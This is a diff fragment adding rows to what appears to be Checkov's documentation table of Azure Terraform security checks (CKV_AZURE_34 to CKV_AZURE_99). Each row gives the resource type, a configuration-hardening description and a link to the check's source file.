+| 1259 | CKV_AZURE_34    | resource | azurerm_storage_container                               | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py)                                             |
+| 1260 | CKV_AZURE_35    | resource | azurerm_storage_account                                 | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                                 |
+| 1261 | CKV_AZURE_35    | resource | azurerm_storage_account_network_rules                   | Ensure default network access rule for Storage Accounts is set to deny                                                                                                                                   | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                                 |
+| 1262 | CKV_AZURE_36    | resource | azurerm_storage_account                                 | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                             |
+| 1263 | CKV_AZURE_36    | resource | azurerm_storage_account_network_rules                   | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                                                                                                                | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                                             |
+| 1264 | CKV_AZURE_37    | resource | azurerm_monitor_log_profile                             | Ensure that Activity Log Retention is set 365 days or greater                                                                                                                                            | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py)                                                                 |
+| 1265 | CKV_AZURE_38    | resource | azurerm_monitor_log_profile                             | Ensure audit profile captures all the activities                                                                                                                                                         | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py)                                                                       |
+| 1266 | CKV_AZURE_39    | resource | azurerm_role_definition                                 | Ensure that no custom subscription owner roles are created                                                                                                                                               | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py)                                                   |
+| 1267 | CKV_AZURE_40    | resource | azurerm_key_vault_key                                   | Ensure that the expiration date is set on all keys                                                                                                                                                       | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py)                                                                                           |
+| 1268 | CKV_AZURE_41    | resource | azurerm_key_vault_secret                                | Ensure that the expiration date is set on all secrets                                                                                                                                                    | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py)                                                                                     |
+| 1269 | CKV_AZURE_42    | resource | azurerm_key_vault                                       | Ensure the key vault is recoverable                                                                                                                                                                      | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py)                                                                               |
+| 1270 | CKV_AZURE_43    | resource | azurerm_storage_account                                 | Ensure Storage Accounts adhere to the naming rules                                                                                                                                                       | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py)                                                                                         |
+| 1271 | CKV_AZURE_44    | resource | azurerm_storage_account                                 | Ensure Storage Account is using the latest version of TLS encryption                                                                                                                                     | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py)                                                               |
+| 1272 | CKV_AZURE_45    | resource | azurerm_virtual_machine                                 | Ensure that no sensitive credentials are exposed in VM custom_data                                                                                                                                       | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py)                                                                                       |
+| 1273 | CKV_AZURE_47    | resource | azurerm_mariadb_server                                  | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                                                                                                                  | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py)                                                                     |
+| 1274 | CKV_AZURE_48    | resource | azurerm_mariadb_server                                  | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                                                                                                             | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py)                                                                       |
+| 1275 | CKV_AZURE_49    | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                                                                                                                      | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py)                                                                                   |
+| 1276 | CKV_AZURE_50    | resource | azurerm_linux_virtual_machine                           | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                               |
+| 1277 | CKV_AZURE_50    | resource | azurerm_windows_virtual_machine                         | Ensure Virtual Machine Extensions are not Installed                                                                                                                                                      | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py)                                                                               |
+| 1278 | CKV_AZURE_52    | resource | azurerm_mssql_server                                    | Ensure MSSQL is using the latest version of TLS encryption                                                                                                                                               | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py)                                                                             |
+| 1279 | CKV_AZURE_53    | resource | azurerm_mysql_server                                    | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                                                                                                               | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py)                                                                           |
+| 1280 | CKV_AZURE_54    | resource | azurerm_mysql_server                                    | Ensure MySQL is using the latest version of TLS encryption                                                                                                                                               | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py)                                                                             |
+| 1281 | CKV_AZURE_55    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Servers                                                                                                                                                      | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py)                                                                                 |
+| 1282 | CKV_AZURE_56    | resource | azurerm_function_app                                    | Ensure that function apps enables Authentication                                                                                                                                                         | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py)                                                             |
+| 1283 | CKV_AZURE_57    | resource | azurerm_app_service                                     | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1284 | CKV_AZURE_57    | resource | azurerm_linux_web_app                                   | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1285 | CKV_AZURE_57    | resource | azurerm_windows_web_app                                 | Ensure that CORS disallows every resource to access app services                                                                                                                                         | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py)                                                                                 |
+| 1286 | CKV_AZURE_58    | resource | azurerm_synapse_workspace                               | Ensure that Azure Synapse workspaces enables managed virtual networks                                                                                                                                    | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                                   |
+| 1287 | CKV_AZURE_59    | resource | azurerm_storage_account                                 | Ensure that Storage accounts disallow public access                                                                                                                                                      | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py)                                                           |
+| 1288 | CKV_AZURE_61    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for App Service                                                                                                                                                  | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py)                                                                         |
+| 1289 | CKV_AZURE_62    | resource | azurerm_function_app                                    | Ensure function apps are not accessible from all regions                                                                                                                                                 | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py)                                                                               |
+| 1290 | CKV_AZURE_63    | resource | azurerm_app_service                                     | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1291 | CKV_AZURE_63    | resource | azurerm_linux_web_app                                   | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1292 | CKV_AZURE_63    | resource | azurerm_windows_web_app                                 | Ensure that App service enables HTTP logging                                                                                                                                                             | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py)                                                                     |
+| 1293 | CKV_AZURE_64    | resource | azurerm_storage_sync                                    | Ensure that Azure File Sync disables public network access                                                                                                                                               | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py)                                                               |
+| 1294 | CKV_AZURE_65    | resource | azurerm_app_service                                     | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
+| 1295 | CKV_AZURE_65    | resource | azurerm_linux_web_app                                   | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
+| 1296 | CKV_AZURE_65    | resource | azurerm_windows_web_app                                 | Ensure that App service enables detailed error messages                                                                                                                                                  | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py)                                                 |
+| 1297 | CKV_AZURE_66    | resource | azurerm_app_service                                     | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1298 | CKV_AZURE_66    | resource | azurerm_linux_web_app                                   | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1299 | CKV_AZURE_66    | resource | azurerm_windows_web_app                                 | Ensure that App service enables failed request tracing                                                                                                                                                   | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py)                                                                   |
+| 1300 | CKV_AZURE_67    | resource | azurerm_function_app                                    | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                                     |
+| 1301 | CKV_AZURE_67    | resource | azurerm_function_app_slot                               | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                                                                                                                | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py)                                                                     |
+| 1302 | CKV_AZURE_68    | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server disables public network access                                                                                                                                             | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py)                                                     |
+| 1303 | CKV_AZURE_69    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Azure SQL database servers                                                                                                                                   | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py)                                                                           |
+| 1304 | CKV_AZURE_70    | resource | azurerm_function_app                                    | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1305 | CKV_AZURE_70    | resource | azurerm_function_app_slot                               | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1306 | CKV_AZURE_70    | resource | azurerm_linux_function_app                              | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1307 | CKV_AZURE_70    | resource | azurerm_linux_function_app_slot                         | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1308 | CKV_AZURE_70    | resource | azurerm_windows_function_app                            | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1309 | CKV_AZURE_70    | resource | azurerm_windows_function_app_slot                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                               |
+| 1310 | CKV_AZURE_71    | resource | azurerm_app_service                                     | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1311 | CKV_AZURE_71    | resource | azurerm_linux_web_app                                   | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1312 | CKV_AZURE_71    | resource | azurerm_windows_web_app                                 | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                           |
+| 1313 | CKV_AZURE_72    | resource | azurerm_app_service                                     | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1314 | CKV_AZURE_72    | resource | azurerm_linux_web_app                                   | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1315 | CKV_AZURE_72    | resource | azurerm_windows_web_app                                 | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                                       |
+| 1316 | CKV_AZURE_73    | resource | azurerm_automation_variable_bool                        | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1317 | CKV_AZURE_73    | resource | azurerm_automation_variable_datetime                    | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1318 | CKV_AZURE_73    | resource | azurerm_automation_variable_int                         | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1319 | CKV_AZURE_73    | resource | azurerm_automation_variable_string                      | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                                       |
+| 1320 | CKV_AZURE_74    | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py)                                                                 |
+| 1321 | CKV_AZURE_75    | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py)                                             |
+| 1322 | CKV_AZURE_76    | resource | azurerm_batch_account                                   | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py)                                               |
+| 1323 | CKV_AZURE_77    | resource | azurerm_network_security_group                          | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                         |
+| 1324 | CKV_AZURE_77    | resource | azurerm_network_security_rule                           | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                         |
+| 1325 | CKV_AZURE_78    | resource | azurerm_app_service                                     | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1326 | CKV_AZURE_78    | resource | azurerm_linux_web_app                                   | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1327 | CKV_AZURE_78    | resource | azurerm_windows_web_app                                 | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                                       |
+| 1328 | CKV_AZURE_79    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py)                                                                       |
+| 1329 | CKV_AZURE_80    | resource | azurerm_app_service                                     | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                             |
+| 1330 | CKV_AZURE_80    | resource | azurerm_windows_web_app                                 | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                             |
+| 1331 | CKV_AZURE_81    | resource | azurerm_app_service                                     | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py)                                                                                     |
+| 1332 | CKV_AZURE_82    | resource | azurerm_app_service                                     | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py)                                                                               |
+| 1333 | CKV_AZURE_83    | resource | azurerm_app_service                                     | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py)                                                                                   |
+| 1334 | CKV_AZURE_84    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py)                                                                                 |
+| 1335 | CKV_AZURE_85    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py)                                                                           |
+| 1336 | CKV_AZURE_86    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Container Registries                                                                                                                                         | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py)                                                             |
+| 1337 | CKV_AZURE_87    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py)                                                                             |
+| 1338 | CKV_AZURE_88    | resource | azurerm_app_service                                     | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1339 | CKV_AZURE_88    | resource | azurerm_linux_web_app                                   | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1340 | CKV_AZURE_88    | resource | azurerm_windows_web_app                                 | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                             |
+| 1341 | CKV_AZURE_89    | resource | azurerm_redis_cache                                     | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py)                                                     |
+| 1342 | CKV_AZURE_91    | resource | azurerm_redis_cache                                     | Ensure that only SSL are enabled for Cache for Redis                                                                                                                                                     | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py)                                                                         |
+| 1343 | CKV_AZURE_92    | resource | azurerm_linux_virtual_machine                           | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                               |
+| 1344 | CKV_AZURE_92    | resource | azurerm_windows_virtual_machine                         | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                               |
+| 1345 | CKV_AZURE_93    | resource | azurerm_managed_disk                                    | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py)                                                                   |
+| 1346 | CKV_AZURE_94    | resource | azurerm_mysql_flexible_server                           | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                                   |
+| 1347 | CKV_AZURE_94    | resource | azurerm_mysql_server                                    | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                                   |
+| 1348 | CKV_AZURE_95    | resource | azurerm_virtual_machine_scale_set                       | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                   |
+| 1349 | CKV_AZURE_96    | resource | azurerm_mysql_server                                    | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py)                                                                                 |
+| 1350 | CKV_AZURE_97    | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                           |
+| 1351 | CKV_AZURE_97    | resource | azurerm_windows_virtual_machine_scale_set               | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                           |
+| 1352 | CKV_AZURE_98    | resource | azurerm_container_group                                 | Ensure that Azure Container group is deployed into virtual network                                                                                                                                       | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py)                                   |
+| 1353 | CKV_AZURE_99    | resource | azurerm_cosmosdb_account                                | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py)                                                             |
